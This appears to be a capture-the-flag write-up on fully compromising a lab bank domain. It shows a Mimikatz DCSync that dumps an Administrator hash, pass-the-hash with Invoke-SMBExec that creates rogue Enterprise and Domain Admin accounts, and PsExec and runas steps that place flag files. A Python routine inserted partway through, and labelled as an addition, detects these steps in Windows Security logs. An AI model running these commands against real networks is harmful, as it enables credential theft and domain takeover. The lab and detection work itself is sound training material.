# Full Compromise of BANK Domain

## Used Tools

Powershell

Mimikatz

PsExec

Invoke-SMBExec.ps1

Remmina

Windows Remote Desktop

## Summary

Within the context of the Administrator impersonated by our golden ticket, we are able to retrieve the hash of the local administrator. With this hash, we use SMBExec to create our own user on the rootdc and equip it with all the rights necessary to do anything there. From there we are able to connect to the bankdc, create our own user in the bank domain and, with these users, place the proofs of compromise on all the machines available.

## Investigation

From the child domain, we are not able to reach the bankdc directory.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7TUldZqWxeidOsPHtTH2%2FUntitled.png?alt=media&#x26;token=5da4cdc7-5bcb-4f91-a249-7510cda89e2a" alt=""><figcaption></figcaption></figure>

As already mentioned in the previous section, we’ll use the running webservers on attack machine and the VPN to get the tools PSExec and SMBExec.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FxmVyurQWGDYmmnlO2K7M%2FUntitled%201.png?alt=media&#x26;token=143fa567-130f-4fa0-afd0-8d78378d7aff" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FXSJdq8VoomwAry4CVCOn%2FUntitled%202.png?alt=media&#x26;token=16a29e28-ebe3-44f6-aae7-bb515ba015a2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FhfGYxo9bbVG4pccJXlTx%2FUntitled%203.png?alt=media&#x26;token=074f2541-4872-4297-84b5-abf9de4b1c1d" alt=""><figcaption></figcaption></figure>

We start a second PowerShell as Administrator to run PsExec, which we use to validate the commands dropped via SMBExec.

Running PsExec in the context of the Administrator we impersonate through the golden ticket, we are able to connect to the rootdc and get a command line.

```
PS C:\Users\0xb0b\Documents> .\PsExec.exe \\rootdc.thereserve.loc cmd.exe
```

With the connection established, we try to add our rootdc user, but are not able to do so:

`New-ADUser 0xb0b_rootdc`

`Add-ADGroupMember -Identity 'Enterprise Admins' -Members 0xb0b_rootdc`

`Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b_rootdc`

`Set-ADAccountPassword -Identity 0xb0b_rootdc -NewPassword (ConvertTo-SecureString -AsPlainText 'WhoKnows1337Me!' -Force)`

`Enable-ADAccount -Identity '0xb0b_rootdc'`

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FJDIwpRPzvW1RP4foq3Rz%2FUntitled%204.png?alt=media&#x26;token=eed8d230-0b35-4f34-9ba5-45ec03b28167" alt=""><figcaption></figcaption></figure>

The next idea is to retrieve the Administrator hash we originally wanted to get in the Full Compromise Parent Domain section. Now, within the context of the golden ticket, we are able to retrieve the hash using the SID we already retrieved in the last section.

`lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500`

Without golden ticket administrator impersonation:

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FPzp9rJ0U3rhhxqS1uZ7H%2FUntitled%205.png?alt=media&#x26;token=80e386db-a41e-4660-a269-a8b7595a5c89" alt=""><figcaption></figcaption></figure>

With golden ticket administrator impersonation:

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FkxhOp4k9RfWQ35gLCHya%2FUntitled%206.png?alt=media&#x26;token=dd44e6e7-20f2-4458-857d-6ba534acbb01" alt=""><figcaption></figcaption></figure>

And we have the Administrator hash: `58a478135a93ac3bf058a5ea0e8fdb71`

With this hash we can pass the hash using SMBExec and drop our commands on the rootdc to add a user. We won’t get any feedback, but we still have the PsExec session running, which comes in handy because it lets us check whether our input was successful.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FkY7tl48mlFdQCpdzrPff%2FUntitled%207.png?alt=media&#x26;token=3f025de3-024b-4ca1-816d-801306ecedbd" alt=""><figcaption></figcaption></figure>

We run `Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "mkdir C:\Test" -verbose` to create a directory on the `C:\` drive of the rootdc.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FYJZ0nRihMQnQxSTMEZW4%2FUntitled%208.png?alt=media&#x26;token=0802a7c7-61da-4277-af77-9ce676260008" alt=""><figcaption></figcaption></figure>

And we check if it is there in the PsExec session:

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FwZQkNi3cz1nXmGAL4xSV%2FUntitled%209.png?alt=media&#x26;token=ff2e6845-990e-466c-a471-f94a061f7b44" alt=""><figcaption></figcaption></figure>

Now we add a user to ROOTDC that allows us to access BANKDC, equipping it with the full portfolio of rights by adding it to the Domain Admins and Enterprise Admins groups.

```powershell
Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe New-ADUser 0xb0b_rootdc" -verbose

Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Add-ADGroupMember -Identity 'Enterprise Admins' -Members 0xb0b_rootdc" -verbose

Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Add-ADGroupMember -Identity 'Domain Admins' -Members 0xb0b_rootdc" -verbose

Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Set-ADAccountPassword -Identity 0xb0b_rootdc -NewPassword (ConvertTo-SecureString -AsPlainText 'WhoKnows1337Me!' -Force)" -verbose

Invoke-SMBExec -Target 10.200.103.100 -Domain thereserve.loc -Username Administrator -Hash 58a478135a93ac3bf058a5ea0e8fdb71 -Command "powershell.exe Enable-ADAccount -Identity '0xb0b_rootdc'" -verbose
```

Everything runs through to create the rootdc user.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F7XEdrTbWRxADvSoSbpWI%2FUntitled%2010.png?alt=media&#x26;token=b62a0fa3-216e-4be3-835e-f0df07ca3d83" alt=""><figcaption></figcaption></figure>

And we have a user on rootdc.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FcjLkJ5T6yQwQj3deh60n%2FUntitled%2011.png?alt=media&#x26;token=ad123b5f-fd15-40f4-9573-90458f94d9d3" alt=""><figcaption></figcaption></figure>
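As an added defender-side example (not code from this writeup or the challenge), here is a small Python triage routine for the Security-log trail that the DCSync above and the pass-the-hash plus privileged-group additions leave on the rootdc. It assumes events have already been pre-parsed into dicts with the field names used here (e.g. exported with Get-WinEvent and converted to JSON); the sample events and the source IP are constructed.

```python
# Added example (not from the writeup): triage pre-parsed Security-log events
# for the trail the chain above leaves on a DC: DCSync (4662 requesting
# replication rights), NTLM network logon with the dumped hash (4624, type 3)
# and adds to Domain/Enterprise Admins (4728 global / 4756 universal group).

# Replication control-access-right GUIDs; a user account requesting them is the DCSync signature.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins"}
GROUP_ADD_EVENTS = {4728, 4756}

def is_dcsync(ev, replication_allowlist):
    """4662 requesting replication rights from an account outside the allowlist
    (DC machine accounts and known sync services)."""
    if ev["id"] != 4662 or ev["subject"] in replication_allowlist:
        return False
    # Event XML renders property GUIDs as "{GUID}"; compare without braces.
    requested = {p.strip("{}").lower() for p in ev.get("properties", [])}
    return bool(requested & REPLICATION_RIGHTS)

def is_privileged_group_add(ev):
    return ev["id"] in GROUP_ADD_EVENTS and ev["group"] in PRIVILEGED_GROUPS

def is_ntlm_network_logon(ev):
    # Hash-based SMB logins (Invoke-SMBExec) authenticate with NTLM, not Kerberos.
    return ev["id"] == 4624 and ev.get("logon_type") == 3 and ev.get("auth_package") == "NTLM"

def triage(events, replication_allowlist):
    """Return (rule, detail) tuples in log order so the chain reads as a sequence."""
    findings = []
    for ev in events:
        if is_dcsync(ev, replication_allowlist):
            findings.append(("dcsync", ev["subject"]))
        elif is_privileged_group_add(ev):
            findings.append(("priv-group-add", f'{ev["member"]} -> {ev["group"]}'))
        elif is_ntlm_network_logon(ev):
            findings.append(("ntlm-network-logon", f'{ev["subject"]} from {ev["source_ip"]}'))
    return findings

# Constructed sample events mirroring the steps above (not real log data; the
# source IP is made up). The first 4662 is ordinary DC-to-DC replication.
SAMPLE_EVENTS = [
    {"id": 4662, "subject": "CORPDC$", "properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"id": 4662, "subject": "Administrator", "properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"id": 4624, "subject": "Administrator", "logon_type": 3, "auth_package": "NTLM", "source_ip": "10.50.0.7"},
    {"id": 4756, "member": "0xb0b_rootdc", "group": "Enterprise Admins"},
    {"id": 4728, "member": "0xb0b_rootdc", "group": "Domain Admins"},
]
```

Calling `triage(SAMPLE_EVENTS, {"CORPDC$", "ROOTDC$"})` lists the user-account DCSync, the NTLM network logon and both privileged group additions in order, while the DC-to-DC replication in the first event is ignored.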

We check the domains via Active Directory Domains and Trusts on the child domain's corpdc.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FIXYvydoDFH2xH1gfoQao%2FUntitled%2012.png?alt=media&#x26;token=2dfed41f-4e80-452e-98ea-ac2123f7b4e2" alt=""><figcaption></figcaption></figure>

And from the corpdc we are able to connect to the rootdc via Windows Remote Desktop and our newly created rootdc user.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FLqzNhTptSH1BdKoS52WF%2FUntitled%2013.png?alt=media&#x26;token=ba587afe-e68f-428d-a0cf-5dbed641fc1a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F4P89MHxHmIHCJLyX7Xqk%2FUntitled%2014.png?alt=media&#x26;token=a57eda72-faa9-4464-bf71-948425acb494" alt=""><figcaption></figcaption></figure>

And from the corpdc we are able to connect to the bankdc via Windows Remote Desktop and our newly created rootdc user.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FuJQJk9UTvZ7z8IHwkPg7%2FUntitled%2015.png?alt=media&#x26;token=d8770699-0857-4504-b757-ee2320692667" alt=""><figcaption></figcaption></figure>

From there we are still not able to place our proofs of compromise on all the machines in the bank domain, because our rootdc user doesn't exist there. So we create another user, 0xb0b, on the bankdc.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FqqcUrQrgnl8yudRuKTHi%2FUntitled%2016.png?alt=media&#x26;token=685acd2e-81d6-4a11-a068-d97705900e0f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F555oW6U4ovAcdf8KyxfS%2FUntitled%2017.png?alt=media&#x26;token=f8891fae-a4b0-4ae1-b222-9d9cab0b7808" alt=""><figcaption></figcaption></figure>

Next, we try to place our proofs of compromise on all machines with the use of `runas`, so we don’t have to use RDP for every single machine.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FGyJz4JDxnah6pWCQANWi%2FUntitled%2018.png?alt=media&#x26;token=cc26b4c2-7592-4f68-83f0-f1724339fd51" alt=""><figcaption></figcaption></figure>

To avoid entering a password every time we run `runas`, we just open a `cmd` as `bank\0xb0b`, where `/k` keeps the terminal open, and run our commands from there to place our proofs.

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2F2vd6vLQiBpbXNrYKYrsL%2FUntitled%2019.png?alt=media&#x26;token=17063acd-2604-4ca0-8105-111e3f88b13b" alt=""><figcaption></figcaption></figure>

## Flag-9: Foothold on Bank Division Tier 2 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\work1.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

```
dir \\work1.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FN96D0f9jKHK4r9UE8NJK%2FUntitled%2020.png?alt=media&#x26;token=d11c0f7f-1824-4ede-8dcc-212ffc572179" alt=""><figcaption></figcaption></figure>

## Flag-10: Administrative access to Bank Division Tier 2 Infrastructure

```
mkdir \\work1.bank.thereserve.loc\c$\Users\Administrator
```

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\work1.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

```
dir \\work1.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FT0jHXQ70Jdhw7C3V1NJc%2FUntitled%2021.png?alt=media&#x26;token=47f2b0f7-665b-467f-af8a-ee236c05634c" alt=""><figcaption></figcaption></figure>

## Flag-11: Foothold on Bank Division Tier 1 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\jmp.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

```
dir \\jmp.bank.thereserve.loc\c$\Windows\Temp\0xb0b.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FQCLoUlqdhjXPek9QnkEW%2FUntitled%2022.png?alt=media&#x26;token=5042b74c-e789-49bd-b62a-0fc3b249e932" alt=""><figcaption></figcaption></figure>

## Flag-12: Administrative access to Bank Division Tier 1 Infrastructure

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FUZdmF3NBPs23aWagusq9%2FUntitled%2023.png?alt=media&#x26;token=0717dece-0894-47da-b395-242ab942b1a9" alt=""><figcaption></figcaption></figure>

```
mkdir \\jmp.bank.thereserve.loc\c$\Users\Administrator
```

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > \\jmp.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

```
dir \\jmp.bank.thereserve.loc\c$\Users\Administrator\0xb0b.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FGWPXkpg7WnKgx2o2NBB5%2FUntitled%2024.png?alt=media&#x26;token=47f3f633-9222-4531-b667-d86e556a2326" alt=""><figcaption></figcaption></figure>

## Flag-13: Foothold on Bank Division Tier 0 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FV704qE1OdWN9GpNJGgkW%2FUntitled%2025.png?alt=media&#x26;token=ed488407-bff8-41a6-abb8-19dbfaa512dd" alt=""><figcaption></figcaption></figure>

## Flag-14: Administrative access to Bank Division Tier 0 Infrastructure

```
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Users\Administrator\0xb0b.txt
```

<figure><img src="https://2148487935-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FoqaFccsCrwKo1CHmLRKW%2Fuploads%2FcCpV4Bglr3SIIrnpUhXD%2FUntitled%2026.png?alt=media&#x26;token=d285c783-340b-4cdd-856c-8ac998ba4b29" alt=""><figcaption></figcaption></figure>
